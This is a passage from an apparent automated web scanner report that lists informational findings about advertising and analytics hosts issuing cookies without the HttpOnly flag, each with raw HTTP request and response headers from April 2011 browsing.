Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www605
Content-Length: 0
Content-Type: text/plain


14.32. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303646989.757,wait-%3E10000,&1303646994271 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:51 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

14.33. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:49 2011&recExp=Sun Apr 24 12:09:49 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646989; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24700

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...

14.34. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=2853&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJOVvjFDHGBmzbDBIcekOVM7Pu2ADA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GBmAxjPqt5b8aYRoBABTNBsn

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUXD2qAp.o9VSb5yRFcRQS0cy3DIQDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GIHOABrbWnU3DqIRAFGMGuw-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 03:08:32 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=93909&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


14.35. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1548627385 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 12:29:52 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 12:29:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.36. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253735207&c4=186884836&c5=1&c6=1&c7=Sun%20Apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.hotelclub.com%2Fcommon%2FadRevresda.asp%3Fchannel%3Dhome%26Section%3Dmain%26adsize%3D728x90%26pos%3Dbottom&c9=&c10=http%3A%2F%2Fwww.hotelclub.com%2F&c15=&1303646992514 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Tue, 23-Apr-2013 12:09:49 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.37. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

14.38. http://clk.atdmt.com/go/253732016/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253732016/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_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--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db41880; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 24 Apr 2011 12:33:03 GMT
Connection: close


14.39. http://cmi.netseer.com/match

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:09:57 GMT
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,...........D.;

14.40. http://cmi.netseer.com/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /redirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redirect?ex=10&t=1303614597199 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 03:09:55 GMT
Location: http://cm.g.doubleclick.net/pixel?nid=netseer1
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 0
Connection: keep-alive


14.41. http://ctix8.cheaptickets.com/dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 24 Apr 2011 12:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMTY1ODA3MTY4LjMwMTQ3MTkyAAAAAAABAAAAbgIBAAsTtE0LE7RNAQAAABQuAAALE7RNCxO0TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.42. http://img167.imageshack.us/img167/6361/06ls4.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img167.imageshack.us
Path:   /img167/6361/06ls4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img167/6361/06ls4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img167.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 924976
Last-Modified: Wed, 23 Aug 2006 09:56:56 GMT
X-Server-Name-And-Port: img211.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=bea29fd082ba49ca9dbf1c65e168a013; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.....v.v.......4......................................................................................................    .......................................................................
...[SNIP]...

14.43. http://img262.imageshack.us/img262/3146/17ls3.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img262.imageshack.us
Path:   /img262/3146/17ls3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img262/3146/17ls3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img262.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 67776
Last-Modified: Sun, 06 Apr 2008 21:39:23 GMT
X-Server-Name-And-Port: img262.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=9c5e791d8287483a99eb3be054c25116; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......H.X.."..............................
...[SNIP]...

14.44. http://kroogy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:25:28 GMT; path=/
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
Content-Length: 28083

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Kroogy Search - Home</title>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

14.45. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=lifelock1_cs=1&betq=4353=380320 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=vK5sN5pqHIxFG8povgg3sYARSKMCItdxvhQ3WX8bIMa4F/GCKGexvhQ3gZ8b1qKCaMrBEV7qIEysG/WkBgAoNXAc; GUID=MTMwMzYxNDEyNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: https://ad.yieldmanager.com/pixel?id=562283&t=2
Set-Cookie: C2=wQ5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAc; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
